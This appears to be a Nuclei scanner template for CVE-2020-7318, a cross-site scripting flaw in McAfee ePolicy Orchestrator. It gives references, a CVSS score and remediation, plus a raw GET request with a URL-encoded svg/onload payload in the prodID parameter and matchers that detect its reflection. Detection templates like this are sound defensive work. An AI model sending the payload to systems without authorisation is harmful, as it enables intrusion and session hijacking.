id: CVE-2020-7318 info: name: McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting author: dwisiswant0 severity: medium description: | McAfee ePolicy Orchestrator before 5.10.9 Update 9 is vulnerable to a cross-site scripting vulnerability that allows administrators to inject arbitrary web script or HTML via multiple parameters where the administrator's entries were not correctly sanitized. reference: - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ - https://kc.mcafee.com/corporate/index?page=content&id=SB10332 - https://nvd.nist.gov/vuln/detail/CVE-2020-7318 impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized actions. remediation: | Upgrade to McAfee ePolicy Orchestrator version 5.10.9 Update 9 or later to mitigate this vulnerability. reference: - https://kc.mcafee.com/corporate/index?page=content&id=SB10332 classification: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.3 cve-id: CVE-2020-7318 cwe-id: CWE-79 epss-score: 0.00065 epss-percentile: 0.26966 cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mcafee product: epolicy_orchestrator tags: cve,cve2020,xss,mcafee http: - raw: - | GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1 Host: {{Hostname}} Connection: close matchers-condition: and matchers: - type: word part: header words: - "text/html" - type: word part: body words: - "Policy Name" - "'\">" condition: and - type: status status: - 200 # digest: 490a0046304402202d1cb22987ed6f50f9a8450307b04fb97cb6b3c321c80b9f0488e23e96fcb37f02204df7d0479846817a8336b7fcafe8afda2777f7e03883335b649b88afa68341cc:922c64590222798bb761d5b6d8e72950